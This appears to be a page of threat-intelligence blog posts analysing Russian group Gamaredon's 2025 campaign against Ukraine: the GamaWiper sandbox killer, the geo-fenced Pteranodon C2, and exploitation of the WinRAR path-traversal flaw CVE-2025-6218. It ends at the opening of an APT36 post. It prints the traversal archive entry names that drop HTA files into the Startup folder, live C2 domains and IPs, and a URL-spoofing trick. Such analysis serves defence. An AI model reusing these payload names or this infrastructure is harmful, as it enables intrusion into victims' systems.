After my recent blog posts covering Gamaredon’s ongoing PterodoGraph campaign targeting Ukraine, and following almost a full month of silence in terms of newly observed malware samples, fresh activity has finally resurfaced.
New samples have appeared, along with reports pointing to a component now referred to as GamaWiper.
It is important to note that GamaWiper, or at least very similar scripts has already been observed in Gamaredon operations in previous months. From a purely technical standpoint, this functionality is therefore not entirely new.
What is new, however, is the context in which it is now being deployed.
In this article, I aim to shed some light on what GamaWiper actually is, why Gamaredon is actively delivering it at this stage of the infection chain, and what this shift tells us about the group’s current operational mindset. What initially appears to be just another destructive payload instead turns out to be a deliberate control mechanism, one that decides who receives the real malware and who gets wiped instead
I’ll keep this post a bit shorter and focus only on what’s new, so it doesnt get boring. If you’re looking for deeper technical details, please refer to my previous posts from 22.11.2025 and 13.11.2025, where I covered the core mechanics in depth.
For this analysis, I’m using my deobfuscated version of the sample, next time i’ll maybe show you how to deobfuscate Gamaredon Scripts manually in less then 10 minutes.
After downloading the latest Gamaredon malware sample, it immediately became obvious that the current variants differ noticeably from what we’ve seen before.
Note: I started writing YARA Rules for Gamaredons current samples, you can find them here.
Key Changes at a Glance
Junk URLs now closely resemble real payload delivery URLs
No full Pterodo payload is delivered anymore 🙁
Gamaredon has hardened the delivery of Pterodo samples
Infection Flow – What Changed?
After the user opens the RAR archive and infects their system, the behavior initially looks familiar. On reboot, the Pterodo sample is fetched again, but only if the client is geolocated in Ukraine, as already mentioned in my previous blog posts.
Previously, non-UA clients would simply receive:
an empty page, or
an empty file
Today, however, things look a bit different.
Instead, the client receives GamaWiper.
GamaWiper – Sandbox? Gone.
GamaWiper is essentially a sandbox / VM killer whose sole purpose is to prevent analysis environments from seeing anything useful.
In earlier campaigns, this wasn’t always handled very well. For example, when I used Hybrid-Analysis, it was trivial to extract:
Telegram channels
Graph URLs
infrastructure relationships
This was a classic infrastructure design flaw and a great example of what budget cuts can do to an APT operation 😄
Today, however, the approach is much simpler:
If a sandbox is detected -> wipe it
No telemetry, no infrastructure leaks, no fun.
If you are a doing legit malware research interested in (deobfuscated) Samples from Gamaredon, you can write me an email.
Initial Loader: “GamaLoad”
The initial loader, which I’ll refer to as GamaLoad, implements a multi-stage payload fetch mechanism with dynamically constructed URLs and headers. The goal is resilience: fetch stage two no matter what.
Note: All malicious domains have been removed.
Request Characteristics
Request Type
Method: GET
Client:msxml2.xmlhttp
Execution: synchronous
URL Structure
Each request fetches a randomly generated resource:
/<random>.<ext>
Random filename: 7-10 characters (a-z, 0-9)
Camouflage extensions, e.g.:
wmv
yuv
lgc
rm
jpeg
C2 Fallback Order
The script iterates through multiple sources until a valid payload is received:
Argument URL (if passed at execution)
Hardcoded fallback
Cloudflare Workers domain
Domain fetch using @ notation
Abuse of the URL userinfo field
Dynamic host via check-host.net
HTML parsing
live host extraction
Alternative domain (again using @ notation)
Registry-based URL
Once a working C2 is found, it is stored as a persistent C2 entry.
HTTP Headers
The request uses very explicit and intentionally crafted headers.
User-Agent
A browser-like string combined with a host fingerprint, including:
Computer name
Drive serial number (hex-encoded)
Timestamp
UTC+2
Ukrainian local time expected
Cookie
Static campaign identifier
Rotates regularly (more on that below)
Content-Length
Explicitly set
Even for GET requests
Enables victim identification & tracking Also plays a role in proxy evasion (see below)
Success Condition
A request is considered successful when:
HTTP status is 200
Response size is greater than 91 bytes
Once this condition is met, all remaining fallbacks are skipped.
Payload Processing
Payload received as binary
UTF-8 conversion
Cleanup (CR/LF, delimiters)
Base64 decoding
In-memory execution
No disk writes – classic fileless execution
Evasion Techniques
Multi-stage fallback logic
Dynamic hosts
Delays between requests
Victim-specific User-Agent
Below is an example of a fully constructed request header sent to the payload delivery host.
Payload Rotation
Gamaredon currently rotates payloads every 1-3 hours.
With each rotation, the following variables may change:
Domains for Payload Delivery
User-Agent
Cookie
Content-Length
Why Is Content-Length Set?
The Content-Length HTTP header specifies the size of the request or response body in bytes. Its typical purpose is:
Defining message boundaries
Preventing truncated reads
Enabling correct stream handling
In this case, however, I strongly believe the header is set intentionally for tracking and proxy evasion.
Why?
The loader uses msxml2.xmlhttp. When calling .send() via this client, the Content-Length header is not overwritten.
For a normal residential client, this is usually not an issue. However, many HTTP/HTTPS proxies, especially residential and chained proxies fail to handle this properly and may:
break the connection
modify the request
normalize headers
This behavior is highly detectable.
My conclusion: Gamaredon likely uses this mechanism to filter out proxy-based analysis setups. The choice of client and header behavior is far too specific to be accidental.
So, if you end up receiving GamaWiper instead of a payload, now you know why.
Conclusion
Gamaredon has clearly tightened its operational security.
The infrastructure flaws that previously allowed easy extraction of internal details have been addressed, and sandbox detection has shifted from “leaky but useful” to “wipe and move on”.
While these changes will certainly disrupt some tracking and automated analysis systems, the overall approach feels… let’s say pragmatic, but somewhat heavy-handed.
UPDATE 22.12.2025: Gamaredon updated it’s payload delivery infrastructure. You can find more information here. UPDATE 08.01.2026: If you want to know how to defend against Gamaredon and similar Actors, check out this article. I also started writing YARA Rules for Gamaredons current samples, if you are a valid security researcher and you need them, send ma an email. If you are a doing legit malware research interested in (deobfuscated) Samples from Gamaredon, you can write me an email aswell.
New C2 architecture: DynDNS + Fast-Flux + Telegram + graph.org
Two-stage geo-fencing + header firewall
Pteranodon as the central Stage-2 loader
Server-side registration required for deeper payload access
As the year slowly crawls toward its inevitable end (like certain Russian infrastructure), it’s a good moment to take another detailed look at Gamaredon’s ongoing phishing campaign targeting Ukraine.
I’ve previously published a high-level overview of this campaign, you can check that article out if you want the “lite” version. Today, however, we’re digging deeper: how to untangle the FSB’s infrastructure for this operation and how we managed to extract additional payloads directly from their servers with varying degrees of cooperation from Microsoft’s RAR parser.
A quick thank-you goes out to my brother Ramon, who assisted especially in retrieving additional payloads from Gamaredon’s backend. Family bonding through state-sponsored malware analysis, truly heartwarming.
Dataset Overview
For this analysis, I organized all samples into a structured table divided into Stage-1 and Stage-2 to Stage-X artifacts.
Stage-1 samples are the actual phishing attachments delivered to victims (HTA, LNK, RAR archives).
Stage-2 to Stage-X samples represent everything the Gamaredon infrastructure subsequently downloads once the initial loader executes or the vulnerability is triggered.
Each entry contains:
Filename: original name taken from the email attachment or payload
Hash: SHA-256 fingerprint for verification
Dropped Files: anything extracted or written by the sample (HTA/PS1 loaders, Pteranodon modules, persistence scripts, etc.)
This allows us to map the infection chain fully, from the very first email to the deeper payload ecosystem sitting behind Gamaredon’s firewall-like C2 logic.
In total, we analyzed 37 samples for this write-up.
Передати засобами АСУ Дніпро_6_3_4_4265_17.11.2025.pdf Передати засобами АСУ Дніпро6_3_4_4265_17.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_6_3_4_4265_17.11.2025.HTA
Передати засобами АСУ Дніпро_9_5_5_433_17.11.2025.pdf Передати засобами АСУ Дніпро9_5_5_433_17.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_9_5_5_433_17.11.2025.HTA
Передати засобами АСУ Дніпро_2_7_4_62_13.11.2025.pdf Передати засобами АСУ Дніпро2_7_4_62_13.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_7_4_62_13.11.2025.HTA
Передати засобами АСУ Дніпро_3_8_2_7442_13.11.2025.pdf Передати засобами АСУ Дніпро3_8_2_7442_13.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_3_8_2_7442_13.11.2025.HTA
Передати засобами АСУ Дніпро_2_1_1_7755_12.11.2025.pdf Передати засобами АСУ Дніпро2_1_1_7755_12.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_1_1_7755_12.11.2025.HTA
Передати засобами АСУ Дніпро_2_1_1_7755_11.11.2025.pdf Передати засобами АСУ Дніпро2_1_1_7755_11.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_1_1_7755_11.11.2025.HTA
Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf:.........._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_11-967_11.11.2025.HTA
Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf:.........._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_11-967_10.11.2025.HTA
Перегляд підходів до призову під час мобілізації_2-3716-25_07.11.2025.pdf Перегляд підходів до призову під час мобілізації2-3716-25_07.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2-3716-25_07.11.2025.HTA
The analyzed artifacts make the intention behind this operation painfully clear: the campaign is aimed squarely at Ukrainian military, governmental, political, and administrative entities.
Based on filenames, document themes, and sender infrastructure, Gamaredon’s operational goals can be summarized as follows:
Military intelligence collection (documents, internal communication, location data, organization charts)
Rapid exfiltration (Pteranodon immediately sends host-, user-, and system-metadata to the C2)
Long-term espionage (stealers, wipers, tasking modules, USB spreaders)
This is not an opportunistic campaign. It is a structured, military-oriented espionage and sabotage operation consistent with, and likely coordinated by Russian state intelligence.
Campaign Timeline
Campaign Description
Gamaredon continues to bombard Ukrainian organizations with phishing emails, using a rotating set of attachments and themes. The filenames of the analyzed samples strongly indicate military and political targeting, and the underlying infrastructure is built on large DynDNS farms and Fast-Flux C2 nodes an architecture that screams “FSB budget optimization,” if you will.
Until early November 2025, the group primarily distributed HTA and LNK attachments. Then they shifted strategy, adopting a new Windows vulnerability CVE-2025-6218, allowing infections without the victim consciously executing anything.
Their new favorite delivery vector? RAR archives containing seemingly harmless documents.
What happens?
When a victim opens the RAR archive:
the vulnerability triggers immediately
a hidden HTA is extracted straight into the Windows Startup folder
reboot -> automatic execution -> connection to Gamaredon’s C2
further payloads are downloaded and initial reconnaissance begins
A classic example of Microsoft doing Microsoft things.
Infection Chain (CVE-2025-6218 & CVE-2025-8088)
The multi-stage infection chain used in this campaign is simple, elegant, and annoyingly effective. A key component is the server-side access control logic, which tightly restricts who is allowed to receive further payloads, ensuring that analysts outside the target region receive nothing but empty responses and existential frustration.
1. Initial Access: Web-based Loaders
Entry points include:
HTA attachments
LNK droppers
RAR archives containing HTA or LNK files
And increasingly:
RAR archives exploiting CVE-2025-6218 and CVE-2025-8088
CVE-2025-6218
Vulnerability allowing automatic file extraction into privileged directories
HTA placed into Startup without user execution
CVE-2025-8088
MSHTML execution bypass, circumventing Windows 11 hardening
All these delivery formats share one purpose: download and launch Pteranodon, the central stage-2 loader.
2. Pteranodon Loader
Once the initial dropper executes, it fetches Pteranodon via HTTP(S).
This is where Gamaredon’s C2 firewall kicks in.
Persistence Mechanisms
Pteranodon uses multiple persistence vectors depending on available permissions:
Registry Run keys (HKCU and occasionally HKLM)
Scheduled tasks (5 – 30 minute intervals)
HTA files in the Startup folder
Hidden script copies inside %APPDATA%, %LOCALAPPDATA%, and %PROGRAMDATA%
These ensure the loader survives multiple reboots and can continuously request new tasks and modules.
Communication Structure
Gamaredon’s C2 traffic is distinctive:
XOR + Base64 layering
Pseudo-JSON structures (loose key/value pairs)
Regular tasking requests (download payload, run wiper, USB spread, resend systeminfo)
Operator fingerprints (recurring variable names and patterns)
Pteranodon is intentionally simple, lightweight, and extremely flexible, the malware equivalent of a Russian Lada: It may look primitive, but you’ll be surprised how long it keeps going.
3. Access Control Logic (C2 Firewall)
Gamaredon uses a multi-layered filtering system that serves as both OPSEC and anti-analysis defense.
Purpose of the Access Control Logic
The C2:
only responds fully to Ukrainian IP ranges
verifies browser headers
requires system registration before delivering deeper payloads
This effectively locks out researchers, sandboxes, cloud instances, and… pretty much everyone except the intended victims.
Stages
Stage 1: IP Validation
Non-Ukrainian IP -> HTTP 200 with empty body
Ukrainian IP -> proceed
Stage 2: Header Validation
Must supply correct:
Identifier/Token
User-Agent
Accept-Language
Invalid -> serve a 0-byte file Valid -> proceed
Stage 3: Registration & Tasking
Full payload access only after system registration:
hostname
username
local IP
environment
token
Then the C2 provides:
USB/network spread modules
Wipers
Persistence modules
Stealers
Additional droppers
The basic access control logic looks like this:
4. Campaign Characteristics
Strict Ukraine-only geo-fencing
Strong anti-analysis (empty responses instead of errors)
High variation of initial access files
Consistent use of Pteranodon
Increased abuse of RAR + CVE-2025-6218
Multiple drops per day
Analysis
This article focuses more on mapping the infrastructure than on deep reverse-engineering. If you want in-depth Stage-1 payload analysis, check my previous article.
Once the malicious attachment is executed, it contacts a remote Gamaredon domain and retrieves Pteranodon.
Key observations from sandboxing
Most sandbox environments receive empty responses, expected due to the C2 filtering
Simulating headers alone is insufficient
Regular Ukrainian proxies also fail
Rotating Ukrainian residential proxiesdo work
However, deeper stages require successful registration, which makes automated extraction time-consuming
After bypassing the filters, we obtained obfuscated HTAs containing Base64-encoded VBS Code.
These loaders then fetch:
Pteranodon
wiper modules
auxiliary droppers
etc.
All files are provided in the sample table for further analysis.
Telegram & graph.org C2 Distribution
Gamaredon uses:
Telegram channels for rotating C2 IPs and cryptographic material
graph.org pages for rotating payload URLs
Both platforms are:
ideal for operations requiring frequent updates
highly resilient
hard to take down
https://graph.org/vryivzphxwc-11-11
If you are a doing legit malware research interested in tracking, feel free to write me an email.
Fast-Flux Infrastructure (194.67.71.0/24)
One IP stood out: 194.67.71.75, belonging to REG.RU, a well-known high-abuse Russian hosting provider.
Findings:
200+ IPs in the subnet engaged in coordinated port-scanning against Ukrainian targets (April 2025)
44,157 PassiveDNS entries for the 256 hosts
39,903 unique domains
Typical Fast-Flux characteristics:
extremely short TTL
rapid IP rotation
each IP hosting dozens of unrelated domains
low-quality disposable domain patterns
consistent abusive behavior
This subnet is:
clearly Russian-controlled
used for offensive operations
structurally similar to GRU-affiliated infrastructure
highly likely to be connected directly or indirectly to the FSB
I built a graph on VirusTotal to visualize the malware distribution by the subnet:
NOTE: By clicking ‘Load content’, you consent to data being transmitted to a third-party provider in the United States. Please note that US data protection standards differ from those in the EU.
Changes in the 2025 Gamaredon Campaign
Compared to 2021 – 2024, the 2025 operation shows significant evolution:
1. Zero-Click via CVE-2025-6218
RAR-based exploit allows silent execution with no user interaction.
2. RAR-First Delivery
RAR replaced HTA/LNK as the primary attachment format.
3. More complex access control
Geo-fencing, header checks, registration tokens, and multi-stage filtering.
Better registry/task persistence and more aggressive lateral movement.
Summary
The 2025 Gamaredon campaign is no longer just “phishing with extra steps” It has evolved into a modular, highly dynamic, multi-infrastructure malware ecosystem, powered by:
Zero-click exploits
Geo-fenced C2 delivery
Fast-Flux DNS
Telegram distribution
graph.org rotation
Persistent Pteranodon loaders
…all wrapped in a design philosophy best described as: “If it works, ship it, if it breaks, wrap it in Base64 and ship it anyway.”
MITRE ATT&CK Mapping
The current Gamaredon campaign maps to a wide range of relevant MITRE ATT&CK techniques. Below is a consolidated overview of the most important tactics and techniques observed during the various stages of the operation: (Click To Open)
TA0001 – Initial Access
T1566.001 – Phishing: Spearphishing Attachment Distribution of HTA, LNK, and RAR attachments using thematically relevant document names.
T1204.002 – User Execution: Malicious File Execution of HTA/LNK loaders, or automatic execution via CVE-2025-6218.
TA0002 – Execution
T1059.005 – Command and Scripting Interpreter: Visual Basic Extensive use of HTA and VBScript for initial loader execution.
T1059.001 – Command and Scripting Interpreter: PowerShell Used to download and run Pteranodon modules.
T1203 – Exploitation for Client Execution CVE-2025-6218 enabling automatic HTA placement and execution (zero-click).
TA0003 – Persistence
T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder Persistence achieved via HTA scripts placed in the Startup folder and registry autostarts.
T1053.005 – Scheduled Task/Job Creation of scheduled tasks that periodically re-execute Pteranodon or supplemental scripts.
TA0004 – Privilege Escalation
(No explicit privilege escalation techniques observed; Gamaredon typically operates under user-level permissions.)
TA0005 – Defense Evasion
T1027 – Obfuscated/Encrypted Files and Information Heavy use of BASE64 and XOR layers to obfuscate code and communications.
T1497 – Virtualization/Sandbox Evasion C2 access-control (IP/header validation) to prevent payload delivery to researchers or sandboxes.
T1070 – Indicator Removal on Host Wiper/cleanup scripts remove MRUs, registry traces, and startup entries.
TA0006 – Credential Access
(Seen in earlier Gamaredon campaigns; less prominent in 2025.) T1552.001 – Unsecured Credentials: Credentials in Files Some modules harvest document contents and autocomplete data.
TA0010 – Exfiltration
T1041 – Exfiltration Over C2 Channel Hostnames, usernames, system metadata, and environment details sent directly to C2.
TA0011 – Command and Control
T1071.001 – Application Layer Protocol: Web Protocols C2 communication over HTTP/HTTPS.
T1102.002 – Web Service: Telegram Use of Telegram channels for dynamic IP rotation and distribution of secrets/tokens.
T1102 – Web Service (graph.org) Use of graph.org pages for periodically rotating payload URLs.
T1568.002 – Dynamic DNS Frequent use of DynDNS for rotating C2 domains.
T1090 – Proxy Fast-Flux infrastructure in subnet 194.67.71.0/24 used to proxy malicious infrastructure.
TA0009 – Collection
T1119 – Automated Collection Immediate collection of system information after Pteranodon’s initial registration.
TA0008 – Lateral Movement / Propagation
T1091 – Replication Through Removable Media USB-based propagation (a long-standing Gamaredon tactic).
T1021 – Remote Services(limited) Some modules show capability for internal network spread.
High-Level Indicators for Threat Hunters
This section summarizes the most important behavioral indicators that SOCs, threat hunters, and CERT teams can use to detect Gamaredon activity early. These are high-level detection patterns rather than sample-specific IOCs
1. Network Indicators
HTTP requests from mshta.exe or powershell.exe to DynDNS domains, graph.org pages, or Ukrainian/Russian subnets
Repeated GET requests resulting in 0-byte responses
Outbound traffic to 194.67.71.0/24 (REG.RU Fast-Flux cluster)
Unexpected connections to Telegram API/channels without active user sessions
Very low DNS TTL values for domains rotating across many IPs
2. File System Indicators
Presence of suspicious script files:
HTA/VBS in the Startup folder: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\*.hta
Dropped PowerShell/VBS files in:
%APPDATA%
%LOCALAPPDATA%
%PROGRAMDATA%
Files with pseudo-legitimate names such as Update.hta, Sync.hta, etc.
How a Russian Threat Actor Uses a Recent WinRAR Vulnerability in Their Ukraine Operations
Today we’re taking a look at several malware samples from the advanced persistent threat group “Primitive Bear” aka “Gamaredon”.
Primitive Bear is a Russian state-sponsored Advanced Persistent Threat (APT) group that has been active since at least 2013. With high confidence, the group is attributed to the Federal Security Service of the Russian Federation (FSB), Russia’s domestic intelligence service.
The most recently circulating malware samples caught my attention because they all follow the same pattern and exploit a newly disclosed vulnerability CVE-2025-6218 to load additional malware in later stages.
In this post, I want to walk you through the methodology and the infrastructure used by the attacker.
Below is an overview of the samples I analyzed that make use of CVE-2025-6218, along with their origin. I will continue analyzing additional samples in order to map the attacker’s infrastructure as comprehensively as possible.
Повістка про виклик_357-16230-25_24.10.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_357-16230-25_24.10.2025.HTA
Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_11-967_11.11.2025.HTA
Перегляд підходів до призову під час мобілізації_2-3716-25_07.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2-3716-25_07.11.2025.HTA
Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_11-967_10.11.2025.HTA
Передати засобами АСУ Дніпро_2_1_1_7755_11.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_1_1_7755_11.11.2025.HTA
Передати засобами АСУ Дніпро_2_1_1_7755_12.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_1_1_7755_12.11.2025.HTA
Передати засобами АСУ Дніпро_3_8_2_7442_13.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_3_8_2_7442_13.11.2025.HTA
Передати засобами АСУ Дніпро_2_7_4_62_13.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_7_4_62_13.11.2025.HTA
The campaign I observed clearly targets Ukrainian entities, something we can identify mainly by the filenames used:
Original Filename
English Translation
Повістка про виклик_357-16230-25_24.10.2025.pdf
Subpoena_357-16230-25_24.10.2025.pdf
Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf
Regarding the provision of information (military unit A0135_11-967_11.11.2025).pdf
Перегляд підходів до призову під час мобілізації_2-3716-25_07.11.2025.pdf
Review of approaches to conscription during mobilisation_2-3716-25_07.11.2025.pdf
Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf
Request for information from the commander of military unit A0135_11-967_10.11.2025.pdf
Передати засобами АСУ Дніпро_2_1_1_7755_11.11.2025.pdf
Transfer via automated control system Dnipro_2_1_1_7755_11.11.2025.pdf
Передати засобами АСУ Дніпро_2_1_1_7755_12.11.2025.pdf
Transfer via automated control system Dnipro_2_1_1_7755_12.11.2025.pdf
Передати засобами АСУ Дніпро_3_8_2_7442_13.11.2025.pdf
Transfer via automated control system Dnipro_3_8_2_7442_13.11.2025.pdf
Передати засобами АСУ Дніпро_2_7_4_62_13.11.2025.pdf
Transfer via automated control system Dnipro_2_7_4_62_13.11.2025.pdf
Primitive Bear is well-known for its spear-phishing operations, so none of this is surprising. What is new, however, is the use of RAR archives to load additional malware. Unfortunately, we cannot definitively identify all recipients of these samples, but the filenames give us a pretty good idea of who they were intended for:
File
Probable recipient / Context
Derived from the name
Повістка про виклик_357-16230-25_24.10.2025.pdf
Authorities/judiciary or territorial recruitment centers (ТЦК та СП) for mobilization
“Повістка” can mean court/investigative authority or military summons.
Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf
Military Unit A0135 (Військова частина А0135)
explicit mention of the unit
Перегляд підходів до призову під час мобілізації_2-3716-25_07.11.2025.pdf
Mobilization/personnel offices: ТЦК та СП, Mobilization Department in the MoD/General Staff
Thematic focus: “Approaches to convening”
Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf
Commander of military unit A0135
explicitly addressed
Передати засобами АСУ Дніпро_2_1_1_7755_11.11.2025.pdf
Positions with access to “АСУ Днепр” (АСУ = Automated Management/Information Systems) This is typically MoD/ТЦК/Human Resources
“Transmit via ASU Dnipro” -> internal administration/data channel
Передати засобами АСУ Дніпро_2_1_1_7755_12.11.2025.pdf
as above
Series/sequel document (different date)
Передати засобами АСУ Дніпро_3_8_2_7442_13.11.2025.pdf
as above
other internal classification/filing codes
Передати засобами АСУ Дніпро_2_7_4_62_13.11.2025.pdf
as above
Now that we better understand the context of the samples, we can dive into the actual analysis. Since all samples share a nearly identical structure, we’ll look at the most recent one found, with the hash 237696ecc370688a8d1894eb2f95af53a3c0f8d42eb540b7f529b4d4f4492bc0
The victim receives a RAR archive containing two files: a fake PDF and a HTML Application (HTA). The HTA file always has the same bizarre naming scheme:
This immediately reveals the exploitation of CVE-2025-6218.
The vulnerability is a critical directory traversal -> remote code execution (RCE)flaw in WinRAR (up to version 7.11) on Windows. The bug lies in how RAR archives process file paths: an attacker can craft an archive entry that writes files outside the intended extraction folder e.g., directly into the user’s Startup directory.
Once a file lands in an auto-executed location, it runs on next login or reboot, resulting in RCE with the current user’s privileges. It still requires user interaction, such as opening a malicious archive. The issue is fixed in WinRAR 7.12 (Beta 1) and later.
If you want to get a feeling for the vulnerability, a PoC is definitely worth looking at.
So what actually happens when the victim opens the RAR file?
The user opens the archive.
The archive extracts a .pdf into the current directory.
The archive silently extracts an .hta containing obfuscated VBScript into the Startup folder.
After reboot, the VBScript fetches additional malware.
It’s worth noting that the exploitation of CVE-2025-6218 requires only minimal user interaction. In most cases, the victim merely has to open the malicious RAR archive. No special system configuration is required, no sandbox needs to be disabled, and no “advanced mode” must be enabled. WinRAR’s default extraction behavior is sufficient for the path traversal to write an HTA file directly into the user’s Startup folder.
long story short: the attacker relies only on the victim doing what victims do best, double-clicking whatever lands in their inbox.
Now let’s take a look at what such an HTA file actually looks like:
We see an obfuscation attempt that is, let’s put it politely, more bad than good. Between the actual payload there’s a lot of junk lines:
These can be filtered out easily by looking at each assigned variable. If a variable never gets used or only references itself, it can be safely removed. I did the cleanup manually, because the scripts are tiny and the obfuscation is by no means a masterpiece.
After removing the junk lines and renaming the important variables, I ended up with the following result:
The entire deobfuscation process took about five minutes. The script isn’t complex, so let’s walk through it.
The string pretends to be a legitimate Windows component.
Using mshta.exe is classic: this Windows binary can directly execute remotely hosted HTA/HTML scripts, a typical Living-off-the-Land Binary (LOLBIN) abuse.
president.gov.ua@ looks like an official Ukrainian domain
the real host is readers.serveirc.com, a free DynDNS subdomain acting as C2 or malware hosting server.
3. It executes the payload silently
wshell.Run payload
4. Error suppression
On Error Resume Next
Runtime errors are ignored to avoid crashes or prompts.
5. It closes itself
Close
The script exists purely as a loader/downloader. No real payload is inside, instead it fetches the actual malware (another HTA, VBS, or EXE) from readers.serveirc.com.
This aligns perfectly with Primitive Bear’s usual TTPs:
multi-stage payload chains ending in backdoors for surveillance and exfiltration (e.g., Pteranodon, GammaLoad)
abuse of Windows-native binaries (mshta.exe, wscript.exe)
phishing documents themed around Ukrainian government topics (e.g., “повістка.pdf”)
fast-changing C2 infrastructure on free DNS services (serveirc.com, myftp.biz, ddns.net)
Primitive Bear’s operations often end in the deployment of modular backdoors such as Pteranodon or GammaLoad, both of which are staples of the group’s espionage toolkit:
Pteranodon: A long-running backdoor family used by Primitive Bear since at least 2016. It supports classic cyber-espionage features such as screenshot capture, file exfiltration, keystroke logging, command execution, and staged payload delivery. Modular, noisy, but effective enough for long-term access.
GammaLoad: A lightweight downloader/backdoor frequently used as the “next stage” after initial compromise. Typically retrieves secondary modules, maintains C2 connectivity, and prepares the system for more persistent implants. Often deployed through simple LOLBIN-based loaders (like the one used here).
Nothing revolutionary, just FSB’s usual grab-bag of surveillance toys 😉
Infrastructure used in the 2025 Ukraine Campaign (so far)
Throughout my analysis, I reviewed a large number of recent samples (October – November) from this threat actor. Below is a summary and visualization of the infrastructure I identified.
The actor makes heavy use of DynDNS subdomains, such as:
readers.serveirc.com
dears.serveirc.com …and many others
All of these can be attributed to No-IP, which gives us a pool of recurring IP addresses (including IPs not associated with a Dyn-DNS domain name):
IP-Address
Provider
Country
194.58.66.5
BAXET-GROUP-INC – interlir.com
India
194.58.66.132
BAXET-GROUP-INC – interlir.com
India
194.58.66.192
BAXET-GROUP-INC – interlir.com
India
194.87.240.141
relcom.com
Czech Republic
194.87.230.166
BAXET-GROUP-INC – interlir.com
Greece
194.87.240.215
relcom.com
Czech Republic
185.39.204.82
globconnex.com
Turkey
45.141.234.234
globconnex.com
Ireland
5.8.18.46
Putin
Russia
Some of these IP addresses are provided by InterLIR, including the realcom addresses. InterLIR is essentially an IP address marketplace: companies in need of IPv4 or IPv6 space can buy, rent, or sub-lease unused ranges. The platform advertises fast provisioning, legally vetted transfers, and a European business focus.
Since IPv4 addresses are scarce (and expensive), entire micro-economies have formed around services like this, which attackers happily exploit for disposable infrastructure.
I also rechecked which of the domains still resolve to an active host. During that process, I identified fourteen domains that are currently still active and are likely still being used by the threat actor.
acess-pdf.webhop.me
backup.9fvzesn.us
creates.webhop.me
dears.serveirc.com
digitall.webhop.me
dilopendos.serveirc.com
fixer.serveirc.com
google-pdf.redirectme.net
hosting-redirect.sytes.net
political-news.serveirc.com
freedynamicdns.net
readers.serveirc.com
serversftp.serveirc.com
yeard.serveirc.com
Based on the information available so far, we can also compile a final overview of the files that have been distributed through this infrastructure:
This is not the full list of distributed files in this campaign, but i’ll keep track of further samples and update the list accordingly.
Recommendations for Defenders and Blue Teams
To mitigate and detect this campaign (and similar WinRAR-based exploitation attempts), i recommend the following defensive measures:
Update WinRAR immediately Ensure that WinRAR is updated to version 7.12 (Beta 1) or later, where CVE-2025-6218 has been patched.
Block execution of HTA files In most enterprise environments, .hta files should not be executed at all. Enforce this via AppLocker, WDAC, or enterprise GPO restrictions.
Monitor for LOLBIN misuse Flag suspicious executions of:
mshta.exe
wscript.exe
powershell.exe (especially with remote URLs)
Monitor the Startup folder Creation of .hta, .vbs, .js, or unknown executables inside: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup …should always be treated as high-severity alerts, alway have an eye on this lol.
Inspect email attachments Particularly RAR/ZIP archives containing unusual path structures or files with “hidden extensions” (file.pdf:.hta, etc.).
Network defense Block known C2 domains and sinkhole DynDNS-based infrastructure where possible.
Endpoint logging Ensure Sysmon or a comparable EDR solution logs:
Process creation
File modification in Startup paths
Network connections from LOLBINs
Suspicious command-line parameters
Basically: watch for anything that behaves like Windows, but shouldn’t ^-^
I recently discovered a sample attributed to the threat actor APT36 (“Transparent Tribe”) on MalwareBazaar. APT36 (aka Transparent Tribe) is a Pakistan-aligned cyber-espionage group that has been active since at least 2013 and is primarily focused on intelligence collection against targets in South Asia (government, military, diplomatic and research organizations in India and Afghanistan) The group is known for tailored phishing campaigns and diverse staging techniques (weaponized documents, malicious installers and platform-specific lures), and has a history of delivering custom backdoors and RAT families such as variants of Crimson/Eliza-style malware. Recently observed activity shows the actor expanding its toolset and delivery methods (including Linux desktop-lures and cloud-hosted payloads), which underlines the need to treat seemingly innocuous artifacts (obfuscated scripts, shortcut files, or odd AppData/Temp files) as potentially dangerous.
The sample turned out to be a heavily obfuscated VBScript. In this post I will walk through the manual deobfuscation steps I performed. The SHA256 hash of the file is “d35f88dce5dcd7a1a10c05c2feba1cf478bdb8a65144f788112542949c36dd87”
I first uploaded the file to virustotal. It has been uploaded the first time yesterday (18th of October 2025). Some AV systems already detect the file as malicious.
(note: I call this sample “Abaris” because the dropper decodes part of its payload and writes it into a file named Abaris.txt, which is later used for execution.)
